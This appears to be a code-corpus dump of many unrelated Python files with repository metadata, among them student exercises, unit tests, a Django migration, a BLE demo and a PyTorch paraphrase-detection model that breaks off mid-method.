a15aa9381f0639460207512eace0c0e66ea54b4b | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4327/codes/1602_2049.py | 1ce019700e7801903c6df341e812f94f4b2cb946 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | # Teste seu codigo aos poucos.
# Nao teste tudo no final, pois fica mais dificil de identificar erros.
# Nao se intimide com as mensagens de erro. Elas ajudam a corrigir seu codigo.
x=int(input("informe o dividendo: " ))
y=int(input("informe o divisor: " ))
print (x)
print (y)
print (x//y)
print (x%y) | [
"[email protected]"
] | |
eaa1694453e2fb1d8f4e20c3a6a0852dc8c2f92c | bec66ec0c920939547466b2b8f9d65813d560d1d | /noxious/__init__.py | f007d1198e0435f72d773eb479f29a48d9534092 | [] | no_license | mbr/noxious | cbb3be2ca725a0282db390520306da7ebba75339 | 6c48fe84867d80614defa6bdce4d4640ce657ae5 | refs/heads/master | 2023-06-06T20:42:08.079423 | 2015-08-30T10:54:52 | 2015-08-30T10:54:52 | 41,625,389 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,557 | py | import xml.etree.ElementTree as ET
def from_file(fn):
tree = ET.parse(fn)
return Noxious(tree.getroot())
class Noxious(object):
def __init__(self, elem, parent=None):
self._parent = parent
self._elem = elem
def _all(self):
return [self.__class__(sibling)
for sibling in self._parent._elem.findall(self._elem.tag)]
def _get_path(self):
path = []
tag = self
while tag:
path.insert(0, tag._elem.tag)
tag = tag._parent
root = path.pop(0)
return root + ''.join('[{!r}]'.format(p) for p in path)
def _text(self):
return self._elem.text
def __add__(self, other):
return str(self) + other
def __bool__(self):
e = self._elem
return bool(e.text or list(e))
def __float__(self):
return float(str(self))
def __int__(self):
return int(str(self))
def __getitem__(self, name):
child = self._elem.find(name)
if child is None:
raise KeyError('No child {} on {!r}'.format(name, self))
return self.__class__(child, self)
def __getattr__(self, name):
if name not in self._elem.attrib:
raise AttributeError('No attribute {} on {!r}'.format(name, self))
return self._elem.attrib[name]
# py2:
__nonzero__ = __bool__
def __radd__(self, other):
return other + str(self)
def __str__(self):
return self._text()
def __repr__(self):
return self._get_path()
| [
"[email protected]"
] | |
4b2654ba6bffd9e20cf44a960e8ed5166476ba81 | 749aca95edfaad9e7d8b84dc2c6f62038595efc3 | /mandala.py | dac1d0eae959c6a652cc1f391088ca60e9419b56 | [] | no_license | xmduhan/mandala | efe72b116ec829457cd2286b88b4544d5538861c | eafea6c9ebd0ca913c070f0bf2cbf72a6566b0a7 | refs/heads/master | 2021-06-30T16:30:49.410637 | 2017-09-20T09:44:53 | 2017-09-20T09:44:53 | 104,153,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,494 | py | #!/usr/bin/env python
# encoding: utf-8
import dataset
from pyfiglet import Figlet
from termcolor import cprint
from prompt_toolkit import prompt as _prompt
from prompt_toolkit.history import InMemoryHistory
from itertools import count
from treelib import Tree
from pandas import DataFrame
history = InMemoryHistory()
db = dataset.connect('sqlite:///db.sqlite')
table = db['relation']
db.begin()
def commit():
""" """
db.commit()
db.begin()
print u'保存成功!'
def rollback():
""" """
db.rollback()
db.begin()
print u'操作撤销'
def save(w0, w1):
""" """
table.insert({'w0': w0, 'w1': w1})
# print u'%s --> %s: ' % (w0, w1)
cprint(' |-- ', 'green', end='')
cprint('%s --> %s: ' % (w0, w1), color='blue', end='')
cprint('+1', 'red')
def prompt(text):
return _prompt(text, history=history).strip()
def star(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
def chain(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
w0 = w1
def readLevel():
while True:
levelString = prompt(u'最大递归级数(3):')
if len(levelString) == 0:
levelString = 3
try:
level = int(levelString)
return level
except Exception:
print u'输入有误, 必须是整数!'
def lookup():
""" """
w0 = prompt(u'关键字:')
level = readLevel()
qs = db.query('select w0, w1, count(*) n from relation group by w0, w1')
df = DataFrame(list(qs))
tree = Tree()
tree.create_node(w0, w0)
appendList = []
def append(w0, level=5):
if w0 in appendList or level == 0:
return
appendList.append(w0)
for i, row in df[df['w0'] == w0].iterrows():
w1 = row['w1']
n = row['n']
# print w0, '-->', w1
if w1 not in tree:
title = '%s[%d]' % (w1, n)
tree.create_node(title, w1, parent=w0)
else:
# 出现循环
title = '%s[%d](*)' % (w1, n)
tree.create_node(title, i, parent=w0)
append(w1, level - 1)
append(w0, level)
tree.show()
def quit():
""" """
print u'再见!'
db.rollback()
exit()
def help():
""" """
print u'star: 星型添加'
print u'chain: 链式添加'
print u'commit: 保存'
print u'rollback: 取消'
print u'lookup: 查找'
print u'quit: 退出'
print u'help: 帮助'
commands = {
'star': star,
'chain': chain,
'lookup': lookup,
'commit': commit,
'rollback': rollback,
'quit': quit,
'help': help,
}
def main():
""" """
# 打印logo
f = Figlet(font='slant')
print f.renderText('Mandala')
# 读取并执行命令
try:
while True:
cmd = prompt(u'mandala>')
if cmd in commands:
commands[cmd]()
else:
print u'无效命令'
except KeyboardInterrupt:
quit()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
35da38996a54cfbccf733b5859960068514b4714 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2332/60592/271480.py | f602a8c01f31dbba291aa53971306002fff48fef | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | base = int(input())
tar = int(input())
res = 0
fun = []
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1:
te += 1
break
mark = 0
while mark <= tem:
mark = pow(base,i)
i+=1
te+=i-3
mark/=base
tem-=mark
if tem!= 0:
te+=1
fun.append(te)
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1 or tem == -1:
te+=1
break
mark = 0
while mark < abs(tem):
mark = pow(base,i)
i+=1
te+=i-2
if tem < 0:
tem+=mark
elif tem>0:
tem-=mark
if tem != 0:
te+=1
fun.append(te)
print(min(fun)) | [
"[email protected]"
] | |
516a6530d09f3f2717a8b0cf0e85c849bb9f4ad0 | f63907d2115becd64704ef1881f3bfcb7ba9047d | /sandbox/test/testTemplate.py | 91ba4b483092ee7a004dca1be860007bfd13cdaa | [] | no_license | AseiSugiyama/NZMATH-Python3 | d456610f72071a654531583228e439ffa8a4db0c | f65b176be2e58fafa0eea91f399c9ab17f3f478b | refs/heads/master | 2020-05-21T07:26:51.434191 | 2019-04-27T09:52:18 | 2019-04-27T09:52:18 | 185,959,644 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 989 | py | import unittest
import sandbox.hoge as hoge
class HogeTest (unittest.TestCase):
"""
Test classes must inherite unittest.TestCase.
They have name suffixed with 'Test'.
"""
def setUp(self):
"""
setUp is run before each test method run.
"""
pass
def tearDown(self):
"""
tearDown is run after each test method run.
"""
pass
def testHuga(self):
"""
Every test method have name prefixed with 'test'.
"""
# asserting something
self.assert_(hoge.ishoge(), "optional message string")
# asserting equality
self.assertEqual(1, hoge.huga)
# The following part is always unedited.
def suite(suffix="Test"):
suite = unittest.TestSuite()
all_names = globals()
for name in all_names:
if name.endswith(suffix):
suite.addTest(unittest.makeSuite(all_names[name], "test"))
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
| [
"devnull@localhost"
] | devnull@localhost |
2b900473f8ebad3774236008a4ce12609bd077c4 | c4af67db4c523d20f2d55aef90ba77db1fb53c38 | /validation/tests/test_validation.py | c1128b9d609b6db323abf0d49d809d2207be7177 | [] | no_license | dtgit/dtedu | e59b16612d7d9ea064026bf80a44657082ef45a3 | d787885fe7ed0de6f9e40e9b05d852a0e9d60677 | refs/heads/master | 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,060 | py |
from Testing import ZopeTestCase
from Products.Archetypes.tests.atsitetestcase import ATSiteTestCase
from Testing.ZopeTestCase import doctest
from Products.validation import validation
class TestValidation(ATSiteTestCase):
def test_inNumericRange(self):
v = validation.validatorFor('inNumericRange')
self.failUnlessEqual(v(10, 1, 20), 1)
self.failUnlessEqual(v('10', 1, 20), 1)
self.failIfEqual(v(0, 4, 5), 1)
def test_isPrintable(self):
v = validation.validatorFor('isPrintable')
self.failUnlessEqual(v('text'), 1)
self.failIfEqual(v('\u203'), 1)
self.failIfEqual(v(10), 1)
def test_isSSN(self):
v = validation.validatorFor('isSSN')
self.failUnlessEqual(v('111223333'), 1)
self.failUnlessEqual(v('111-22-3333', ignore=r'-'), 1)
def test_isUSPhoneNumber(self):
v = validation.validatorFor('isUSPhoneNumber')
self.failUnlessEqual(v('(212) 555-1212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('2125551212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('(212) 555-1212'), 1)
def test_isURL(self):
v = validation.validatorFor('isURL')
self.failUnlessEqual(v('http://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('https://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('irc://[email protected]:6667/#plone'), 1)
self.failUnlessEqual(v('fish://tiran:password@myserver/~/'), 1)
self.failIfEqual(v('http://\n'), 1)
self.failIfEqual(v('../foo/bar'), 1)
def test_isEmail(self):
v = validation.validatorFor('isEmail')
self.failUnlessEqual(v('[email protected]'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('me'), 1)
def test_isMailto(self):
v = validation.validatorFor('isMailto')
self.failUnlessEqual(v('mailto:[email protected]'), 1)
self.failIfEqual(v('[email protected]'), 1)
self.failIfEqual(v('mailto:@foo.bar'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('mailto:'), 1)
self.failIfEqual(v('me'), 1)
def test_isUnixLikeName(self):
v = validation.validatorFor('isUnixLikeName')
self.failUnlessEqual(v('abcd'), 1)
self.failUnless(v('a_123456'), 1)
self.failIfEqual(v('123'), 1)
self.failIfEqual(v('ab.c'), 1)
self.failIfEqual(v('ab,c'), 1)
self.failIfEqual(v('aaaaaaaab'), 1) # too long
def test_isValidId(self):
v = validation.validatorFor("isValidId")
self.failIfEqual(v("a b", object()), 1)
# TODO: more tests require a site
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestValidation))
doctests = (
'Products.validation.validators.ExpressionValidator',
)
for module in doctests:
suite.addTest(doctest.DocTestSuite(module))
return suite
| [
"[email protected]"
] | |
edd7334352747e1e9b08be0af986b1239e3ee6fe | 5a25edcf994a760688dc7c933e8071bf4ff24df3 | /exercises/ja/solution_01_08_01.py | 01762ddd77ee431a33af88413c4449ddfc5b02bc | [
"CC-BY-NC-4.0",
"MIT"
] | permissive | heyMP/spacy-course | 8762990ed6179011680730d9c24d5d34c0a8d954 | 3740c717f0d1090b01c1b0fe23f8e30af3bf0101 | refs/heads/master | 2022-11-07T21:52:15.479840 | 2020-06-25T18:13:44 | 2020-06-25T18:13:44 | 275,202,487 | 1 | 0 | MIT | 2020-06-26T16:39:32 | 2020-06-26T16:39:31 | null | UTF-8 | Python | false | false | 476 | py | import spacy
nlp = spacy.load("en_core_web_sm")
text = "It’s official: Apple is the first U.S. public company to reach a $1 trillion market value"
# テキストを処理
doc = nlp(text)
for token in doc:
# トークンの文字列、品詞タグ、依存関係ラベルを取得
token_text = token.text
token_pos = token.pos_
token_dep = token.dep_
# フォーマットしてプリント
print(f"{token_text:<12}{token_pos:<10}{token_dep:<10}")
| [
"[email protected]"
] | |
2f7b555b8a023acfc59b3616b78949d6bc53ab5f | 3349a0d44da04fd9fae7728ce1315ccf0c82285e | /556A - case of zeroes and ones.py | c96ebf9ebc0e1aad3e01b362c37be5bd17da4cdb | [] | no_license | umairnsr87/Data_Structures_Python | 959848e546fd4f98959bc14470c26ce91bfb5c9c | 05b5803521ed2ec7f64d95f08e2f014471dfdfd4 | refs/heads/master | 2023-07-18T12:11:55.245699 | 2023-07-16T17:01:09 | 2023-07-16T17:01:09 | 294,360,086 | 0 | 0 | null | 2023-07-16T17:01:10 | 2020-09-10T09:11:11 | Python | UTF-8 | Python | false | false | 567 | py | from collections import Counter
test = int(input())
strings = input()
# time complexity:O(n)
# while '01' or '10' in strings:
# if '01' in strings:
# strings = strings.replace('01', '')
# elif '10' in strings:
# strings = strings.replace('10', '')
# else:
# break
#
# print(len(strings))
# time complexity:O(1)
x = Counter(strings)
if (x['0'] == x['1']) and (x['0'] + x['1']) == len(strings):
print(0)
elif not x['1'] or not x['0']:
print(len(strings))
else:
a = min(x['0'], x['1'])
print(len(strings) - 2 * a)
| [
"[email protected]"
] | |
d8068915b32c07cb896a8397d6b917f876d3b5fe | 4549c02dac55f2b8ed113ddacf95264630d91698 | /Predict/__init__.py | 022ca012e6428d9d89aadfa04b3b27bb059bca6b | [] | no_license | kiminh/GPA | 43077bb59797a096e3660b226642c5fe091a9663 | 29c5ffd8d7aa1bc3ebe6d83d1e55a997a04e4b60 | refs/heads/master | 2021-02-10T20:45:35.581410 | 2020-01-14T08:59:00 | 2020-01-14T08:59:00 | 244,417,955 | 1 | 0 | null | 2020-03-02T16:23:00 | 2020-03-02T16:23:00 | null | UTF-8 | Python | false | false | 98 | py | # -*- coding: utf-8 -*-
# @Time : 2019/11/19 10:58
# @Author : zxl
# @FileName: __init__.py.py | [
"[email protected]"
] | |
e607164ee72ed5d0071b455388700dbe366a225e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_windlasses.py | 6ee113296ad40900fcef0fed2db7fb643eaa9caf | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py |
#calss header
class _WINDLASSES():
def __init__(self,):
self.name = "WINDLASSES"
self.definitions = windlass
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['windlass']
| [
"[email protected]"
] | |
8c8e0126b4969636ebe2d414567e598beb70bf2c | e9a9955da9bee9be6580f1b1a75f97a1f99d0289 | /login/migrations/0016_auto_20190803_1452.py | eb4f2ea18f1fff82b8ba290db60a29457a52f715 | [] | no_license | Manjunatha1997/project_IT | bdb36142256b9d4eb1b75a76994d801dd3c33013 | fe58a30d033d4f4ed818c0282a802fafcf3aaff5 | refs/heads/master | 2021-02-28T04:17:13.872903 | 2020-03-07T15:48:49 | 2020-03-07T15:48:49 | 245,661,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | # Generated by Django 2.1.7 on 2019-08-03 14:52
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0015_auto_20190803_0435'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='dob',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693918)),
),
migrations.AlterField(
model_name='profile',
name='doj',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693948)),
),
]
| [
"[email protected]"
] | |
f17669184ef2e9e58cc9613ffd6e8add89126ea3 | 09e8c92187ff8d7a726727041e2dd80850dcce3d | /leetcode/028_implement_strStr_TRICKY.py | 7154dcc9281455ccd29a545cb11042da6c8c43ad | [] | no_license | kakru/puzzles | 6dd72bd0585f526e75d026f3ba2446b0c14f60e0 | b91bdf0e68605f7e517446f8a00b1e0f1897c24d | refs/heads/master | 2020-04-09T09:47:31.341475 | 2019-05-03T21:24:41 | 2019-05-03T21:24:41 | 160,246,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,846 | py | #/usr/bin/env python3
import unittest
class Solution:
def strStr(self, haystack, needle):
"""
:type haystack: str
:type needle: str
:rtype: int
"""
h_len = len(haystack)
n_len = len(needle)
i = 0
while i <= h_len - n_len:
if haystack[i:i+n_len] == needle:
return i
i += 1
return -1
#
# There is a problem with a step by step solution it's easy to forget about:
# haystack="mississippi", needle="issippi"
# mississippi
# issippi --> X
# mississippi
# issippi --> OK
# the loop index on the haystack cannot go back to 0 !!
class BasicTest(unittest.TestCase):
def test_1(self):
input_ = "hello", "ll"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_2(self):
input_ = "helo", "ll"
expected_output = -1
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_3(self):
input_ = "abc", ""
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_4(self):
input_ = "abc"*100000, "cab"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_5(self):
input_ = "a", "a"
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_6(self):
input_ = "mississippi", "issippi"
expected_output = 4
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
if __name__ == '__main__':
unittest.main(verbosity=2) | [
"[email protected]"
] | |
ea641622136b336a1f7196b18e51f101df6df097 | d45bb44b0dfabfeff37c21a6ac0be1362782e39a | /utils/import_bookmarks.py | ea763b006243bdea76577f71ce07e8fba1168997 | [] | no_license | SyJarvis/BookmarkManager | c25f9df8cb0d0719de805f8080a7ae78c5ac529c | dc3baf06fd47c4514b148134ee3d3fa03f7f1571 | refs/heads/master | 2023-03-26T17:14:17.776441 | 2021-03-21T14:58:58 | 2021-03-21T14:58:58 | 322,634,112 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | from pyquery import PyQuery as pq
class BookmarksTodb():
def __init__(self, filename='utils/bookmarks_2020_5_5_win.html'):
with open(filename, 'r+', encoding='utf-8') as file:
self.html = file.read()
self.doc = pq(self.html)
def get_cage_list(self):
cage_li = []
items = self.doc('H3')
for cage in items:
cage_li.append(cage.text)
return cage_li
def get_url_list(self):
lis = self.doc('A').items()
datas = []
for li in lis:
url_params = {}
url_params['url'] = li.attr('href')
url_params['title'] = li.text()
print(url_params)
datas.append(url_params)
return datas
| [
"[email protected]"
] | |
44f7d5e6d9055b7acb7c3147d5e6aa735fc3ce3e | a09e70355b756bd5cba55246e17eb0480af6257b | /examples/ble_demo_central.py | eb56a9cb9b54270e50eb0709aed3104e43dfecc4 | [
"MIT"
] | permissive | devoh747/Adafruit_CircuitPython_BLE | 9735381dc3481661af54ac32d89ec40e006edc5b | 7566483e2dbdb1bf6c71d5629a2ed37b113c7cff | refs/heads/master | 2020-08-09T04:14:59.774817 | 2019-10-10T21:11:07 | 2019-10-10T21:11:07 | 213,995,226 | 0 | 0 | MIT | 2019-10-09T18:33:32 | 2019-10-09T18:33:32 | null | UTF-8 | Python | false | false | 1,319 | py | """
Demonstration of a Bluefruit BLE Central. Connects to the first BLE UART peripheral it finds.
Sends Bluefruit ColorPackets, read from three potentiometers, to the peripheral.
"""
import time
import board
from analogio import AnalogIn
#from adafruit_bluefruit_connect.packet import Packet
# Only the packet classes that are imported will be known to Packet.
from adafruit_bluefruit_connect.color_packet import ColorPacket
from adafruit_ble.scanner import Scanner
from adafruit_ble.uart_client import UARTClient
def scale(value):
"""Scale an value from 0-65535 (AnalogIn range) to 0-255 (RGB range)"""
return int(value / 65535 * 255)
scanner = Scanner()
uart_client = UARTClient()
a3 = AnalogIn(board.A3)
a4 = AnalogIn(board.A4)
a5 = AnalogIn(board.A5)
while True:
uart_addresses = []
# Keep trying to find a UART peripheral
while not uart_addresses:
uart_addresses = uart_client.scan(scanner)
uart_client.connect(uart_addresses[0], 5)
while uart_client.connected:
r = scale(a3.value)
g = scale(a4.value)
b = scale(a5.value)
color = (r, g, b)
print(color)
color_packet = ColorPacket(color)
try:
uart_client.write(color_packet.to_bytes())
except OSError:
pass
time.sleep(0.3)
| [
"[email protected]"
] | |
3652ed9c9aa0576a74edaf5107cd392b4e4156b3 | 85c873074683ce54ab6056c42ca745f672867d72 | /quora/lstm_lvm/model.py | 415184aa3fd978ae5dcc8e9172689184ed6ff217 | [] | no_license | jihunchoi/cross-sentence-lvm-public | 46dbbec5c5cba3db38d42437f7f30dd4e4659fab | c48f890dc994fb538b47bea864c5bc3d182b622e | refs/heads/master | 2022-11-25T08:19:14.639728 | 2020-07-28T05:25:51 | 2020-07-28T05:25:51 | 283,109,097 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,256 | py | from typing import Any, Dict, Optional, Union, List
import torch
from torch import nn
from torch.distributions import Categorical
from torch.nn import functional
from allennlp.common.params import Params
from allennlp.data.vocabulary import Vocabulary
from allennlp.models.model import Model
from allennlp.modules.feedforward import FeedForward
from allennlp.modules.token_embedders import Embedding
from allennlp.modules.seq2seq_encoders import PytorchSeq2SeqWrapper
from allennlp.modules.seq2vec_encoders import PytorchSeq2VecWrapper
from allennlp.nn.activations import Activation
from allennlp.nn.util import (
get_text_field_mask, sequence_cross_entropy_with_logits
)
from allennlp.training.metrics import CategoricalAccuracy
from modules.code_generators import GaussianCodeGenerator, VmfCodeGenerator
from utils.metrics import ScalarMetric
class SeparatedQuoraModel(Model):
_NUM_LABELS = 2
def __init__(self,
params: Params,
vocab: Vocabulary) -> None:
super().__init__(vocab=vocab)
enc_hidden_dim = params.pop_int('enc_hidden_dim', 300)
gen_hidden_dim = params.pop_int('gen_hidden_dim', 300)
disc_hidden_dim = params.pop_int('disc_hidden_dim', 1200)
disc_num_layers = params.pop_int('disc_num_layers', 1)
code_dist_type = params.pop_choice(
'code_dist_type', ['gaussian', 'vmf'],
default_to_first_choice=True)
code_dim = params.pop_int('code_dim', 300)
tie_embedding = params.pop_bool('tie_embedding', False)
emb_dropout = params.pop_float('emb_dropout', 0.0)
disc_dropout = params.pop_float('disc_dropout', 0.0)
l2_weight = params.pop_float('l2_weight', 0.0)
self.emb_dropout = nn.Dropout(emb_dropout)
self.disc_dropout = nn.Dropout(disc_dropout)
self._l2_weight = l2_weight
self._token_embedder = Embedding.from_params(
vocab=vocab, params=params.pop('token_embedder'))
self._encoder = PytorchSeq2VecWrapper(
nn.LSTM(input_size=self._token_embedder.get_output_dim(),
hidden_size=enc_hidden_dim, batch_first=True))
self._generator = PytorchSeq2SeqWrapper(
nn.LSTM(input_size=(self._token_embedder.get_output_dim()
+ code_dim),
hidden_size=gen_hidden_dim, batch_first=True))
self._generator_projector = nn.Linear(
in_features=self._generator.get_output_dim(),
out_features=vocab.get_vocab_size())
if tie_embedding:
self._generator_projector.weight = self._token_embedder.weight
if code_dist_type == 'vmf':
vmf_kappa = params.pop_int('vmf_kappa', 150)
self._code_generator = VmfCodeGenerator(
input_dim=self._encoder.get_output_dim(),
code_dim=code_dim, kappa=vmf_kappa)
elif code_dist_type == 'gaussian':
self._code_generator = GaussianCodeGenerator(
input_dim=self._encoder.get_output_dim(),
code_dim=code_dim)
else:
raise ValueError('Unknown code_dist_type')
self._discriminator = FeedForward(
input_dim=2 * self._code_generator.get_output_dim(),
hidden_dims=[disc_hidden_dim]*disc_num_layers + [self._NUM_LABELS],
num_layers=disc_num_layers + 1,
activations=[Activation.by_name('relu')()] * disc_num_layers
+ [Activation.by_name('linear')()],
dropout=disc_dropout)
self._kl_weight = 1.0
self._discriminator_weight = params.pop_float(
'discriminator_weight', 0.1)
self._gumbel_temperature = 1.0
# Metrics
self._metrics = {
'generator_loss': ScalarMetric(),
'kl_divergence': ScalarMetric(),
'discriminator_accuracy': CategoricalAccuracy(),
'discriminator_loss': ScalarMetric(),
'loss': ScalarMetric()
}
def get_regularization_penalty(self):
sum_sq = sum(p.pow(2).sum() for p in self.parameters())
l2_norm = sum_sq.sqrt()
return self.l2_weight * l2_norm
@property
def l2_weight(self):
return self._l2_weight
@property
def kl_weight(self):
return self._kl_weight
@kl_weight.setter
def kl_weight(self, value):
self._kl_weight = value
@property
def discriminator_weight(self):
return self._discriminator_weight
@discriminator_weight.setter
def discriminator_weight(self, value):
self._discriminator_weight = value
def embed(self, tokens: torch.Tensor) -> torch.Tensor:
return self._token_embedder(tokens)
def encode(self,
inputs: torch.Tensor,
mask: torch.Tensor,
drop_start_token: bool = True) -> torch.Tensor:
if drop_start_token:
inputs = inputs[:, 1:]
mask = mask[:, 1:]
enc_hidden = self._encoder(inputs.contiguous(), mask)
return enc_hidden
def sample_code_and_compute_kld(self,
hidden: torch.Tensor) -> torch.Tensor:
return self._code_generator(hidden)
def discriminate(self,
premise_hidden: torch.Tensor,
hypothesis_hidden: torch.Tensor) -> torch.Tensor:
disc_input = torch.cat(
[premise_hidden + hypothesis_hidden,
(premise_hidden - hypothesis_hidden).abs()],
dim=-1)
disc_input = self.disc_dropout(disc_input)
disc_logits = self._discriminator(disc_input)
return disc_logits
def construct_generator_inputs(self,
embeddings: torch.Tensor,
code: torch.Tensor) -> torch.Tensor:
batch_size, max_length, _ = embeddings.shape
code_expand = code.unsqueeze(1).expand(
batch_size, max_length, -1)
inputs = torch.cat([embeddings, code_expand], dim=-1)
return inputs
def generate(self,
code: torch.Tensor,
max_length: torch.Tensor) -> torch.Tensor:
start_index = self.vocab.get_token_index('<s>')
end_index = self.vocab.get_token_index('</s>')
pad_index = 0
done = torch.zeros_like(max_length).long()
max_max_length = max_length.max().item()
prev_word = (torch.empty_like(done).long().unsqueeze(1)
.fill_(start_index))
generated = []
self._generator.stateful = True
self._generator.reset_states()
for t in range(max_max_length):
if done.byte().all():
break
prev_word_emb = self.embed(prev_word)
input_t = self.construct_generator_inputs(
embeddings=prev_word_emb, code=code)
hidden_t = self._generator(input_t, 1 - done.unsqueeze(1))
pred_t = self._generator_projector(hidden_t).argmax(2)
pred_t.masked_fill_(done.byte(), pad_index)
generated.append(pred_t)
done.masked_fill_(pred_t.eq(end_index).squeeze(1), 1)
done.masked_fill_(max_length.le(t + 1), 1)
prev_word = pred_t
self._generator.stateful = False
generated = torch.cat(generated, dim=1)
return generated
def convert_to_readable_text(self,
generated: torch.Tensor) -> List[List[str]]:
sequences = [seq.cpu().tolist() for seq in generated.unbind(0)]
readable_sequences = []
for seq in sequences:
readable_seq = []
for word_index in seq:
if word_index != 0:
word = self.vocab.get_token_from_index(word_index)
readable_seq.append(word)
readable_sequences.append(readable_seq)
return readable_sequences
def compute_generator_loss(self,
embeddings: torch.Tensor,
code: torch.Tensor,
targets: torch.Tensor,
mask: torch.Tensor) -> torch.Tensor:
inputs = self.construct_generator_inputs(
embeddings=embeddings, code=code)
hiddens = self._generator(inputs.contiguous(), mask)
logits = self._generator_projector(hiddens)
weights = mask.float()
loss = sequence_cross_entropy_with_logits(
logits=logits, targets=targets.contiguous(), weights=weights,
average=None)
return loss
def forward(self,
premise: Dict[str, torch.Tensor],
hypothesis: Dict[str, torch.Tensor],
label: Optional[torch.Tensor] = None) -> Dict[str, Any]:
"""
premise and hypothesis are padded with
the BOS and the EOS token.
"""
pre_mask = get_text_field_mask(premise)
hyp_mask = get_text_field_mask(hypothesis)
pre_tokens = premise['tokens']
hyp_tokens = hypothesis['tokens']
pre_token_embs = self.embed(pre_tokens)
hyp_token_embs = self.embed(hyp_tokens)
pre_token_embs = self.emb_dropout(pre_token_embs)
hyp_token_embs = self.emb_dropout(hyp_token_embs)
output_dict = {}
pre_hidden = self.encode(
inputs=pre_token_embs, mask=pre_mask, drop_start_token=True)
hyp_hidden = self.encode(
inputs=hyp_token_embs, mask=hyp_mask, drop_start_token=True)
pre_code, pre_kld = self.sample_code_and_compute_kld(pre_hidden)
hyp_code, hyp_kld = self.sample_code_and_compute_kld(hyp_hidden)
pre_kld = pre_kld.mean()
hyp_kld = hyp_kld.mean()
pre_gen_mask = pre_mask[:, 1:]
hyp_gen_mask = hyp_mask[:, 1:]
pre_gen_loss = self.compute_generator_loss(
embeddings=pre_token_embs[:, :-1], code=pre_code,
targets=pre_tokens[:, 1:], mask=pre_gen_mask)
hyp_gen_loss = self.compute_generator_loss(
embeddings=hyp_token_embs[:, :-1], code=hyp_code,
targets=hyp_tokens[:, 1:], mask=hyp_gen_mask)
pre_gen_loss = pre_gen_loss.mean()
hyp_gen_loss = hyp_gen_loss.mean()
gen_loss = pre_gen_loss + hyp_gen_loss
kld = pre_kld + hyp_kld
loss = gen_loss + self.kl_weight*kld
if label is not None:
disc_logits = self.discriminate(premise_hidden=pre_code,
hypothesis_hidden=hyp_code)
disc_loss = functional.cross_entropy(
input=disc_logits, target=label)
loss = loss + self.discriminator_weight*disc_loss
output_dict['discriminator_loss'] = disc_loss
self._metrics['discriminator_loss'](disc_loss)
self._metrics['discriminator_accuracy'](
predictions=disc_logits, gold_labels=label)
output_dict['generator_loss'] = gen_loss
output_dict['kl_divergence'] = kld
output_dict['loss'] = loss
self._metrics['generator_loss'](gen_loss)
self._metrics['kl_divergence'](kld)
self._metrics['loss'](loss)
return output_dict
def get_metrics(self, reset: bool = False
